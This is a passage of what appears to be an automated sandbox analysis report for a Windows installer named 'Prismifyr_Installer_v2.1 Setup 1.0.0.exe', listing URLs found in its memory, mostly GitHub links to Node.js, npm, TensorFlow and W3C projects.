Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/ncb000gt/node.bcrypt.js)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/ncb000gt/node.bcrypt.js/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/nickdesaulniers/node-nanomsg/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/node4good/windows-autoconf
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/admin/blob/HEAD/CODE_OF_CONDUCT.md)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/admin/blob/HEAD/CODE_OF_CONDUCT.md).
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/admin/blob/HEAD/Moderation-Policy.md)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/admin/blob/master/CODE_OF_CONDUCT.md)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/gyp-next
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/gyp-next/archive/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/gyp-next/releases)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node-addon-api
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node-addon-api#collaborators)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node-addon-api/issues
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node-gyp#installation
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node-gyp#installation)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node-gyp#on-macos
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node-gyp#on-windows
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node-gyp/issues/1779
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node-gyp/issues/1861
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node-gyp/issues/1927
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node-gyp/labels/ERR%21%20node-gyp%20-v%20%3C%3D%20v5.1.0)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node-gyp/raw/master/macOS_Catalina_acid_test.sh
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node-gyp/releases).
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/blob/c8a04049/lib/internal/errors.js
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/2119
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/35452
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/39758
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/44985
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/49472
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/51486
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/52219
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/12342
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/1771#issuecomment-119351671
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/27791
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/34103#issuecomment-652002364
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/35407#issuecomment-700693439
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/49891#issuecomment-1744673430.
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/normalize/mz
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/npm/cacache
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/npm/make-fetch-happen
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/npm/minipass-fetch.git
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/npm/move-file
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/npm/node-semver.git
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/npm/nopt.git
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/npm/ssri
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/ohler/ert
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/oransel/node-talib/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/osmcode/node-osmium/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/polotek/libxmljs/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/protocolbuffers/protobuf-javascript
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/protocolbuffers/protobuf/blob/master/java/lite.md
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/puppeteer/puppeteer/tree/main/packages/puppeteer-core
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/radioline/node_airtunes/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/rbranson/node-ffi/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/rbranson/node-ffi/blob/master/deps/libffi/libffi.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/request/request/blob/b12a6245/lib/redirect.js#L134-L138
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/requests/toolbelt
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/rvagg/node-leveldown/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/rvagg/node-leveldown/blob/master/deps/leveldb/leveldb.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/rvagg/node-leveldown/blob/master/deps/snappy/snappy.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/sass/node-sass/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/sass/node-sass/blob/master/src/libsass.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/simplejson/simplejson
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/sinonjs/fake-timers/blob/a4c757f80840829e45e0852ea1b17d87a998388e/src/fake-timers
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/substack/node-mkdirp.git
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/tc39/ecma262/blob/HEAD/LICENSE.md
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/tc39/ecma262/issues/1209
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/tc39/proposal-iterator-helpers/issues/169
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/tc39/proposal-weakrefs
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/models
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/tensorflow
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/text.git
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/tflite-support
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/test262-utils/test262-harness-py
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/voodootikigod/node-serialport/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/w3c/ServiceWorker/issues/1356.
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/w3c/ServiceWorker/issues/1356.Property
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/w3c/csswg-drafts/issues/4805
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/w3c/csswg-drafts/issues/4805Custom
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/w3c/gamepad/pull/120
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/w3c/gamepad/pull/120Access
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/w3c/webappsec-permissions-policy/blob/master/features.md#sensor-features
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/w3c/webappsec-permissions-policy/blob/master/features.md#sensor-featuresDeviceOri
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/wasdk/wasmparser
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/xiph/rnnoise
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/xudafeng/nodecv/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/zeux/volk
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/zorkow/speech-rule-user
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://goo.gl/4NeimX
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://goo.gl/4NeimXAccess
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://goo.gl/4NeimXOrigin
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://goo.gl/4NeimXgetDescriptor(s)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://goo.gl/4NeimXreadValue()
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://goo.gl/4NeimXwriteValue()
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://goo.gl/EuHzyv
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://goo.gl/HxfxSQ
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://goo.gl/HxfxSQOrigin
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://goo.gl/HxfxSQrequestDevice()
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://goo.gl/J6ASzs
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://goo.gl/J6ASzsBluetooth
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://goo.gl/LdLk22
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://goo.gl/LdLk22Media
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://goo.gl/LdLk22RemoveElementFromDocumentMapit
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://goo.gl/rStTGz
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://goo.gl/t5IS6M).
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://goo.gle/chrome-insecure-origins
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://google.com/pay
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gyp.gsrc.io)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://heycam.github.io/webidl/#define-the-operations
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://heycam.github.io/webidl/#dfn-default-iterator-object
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://heycam.github.io/webidl/#dfn-iterator-prototype-object
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-interfaces
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-iterable
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-iterable-entries
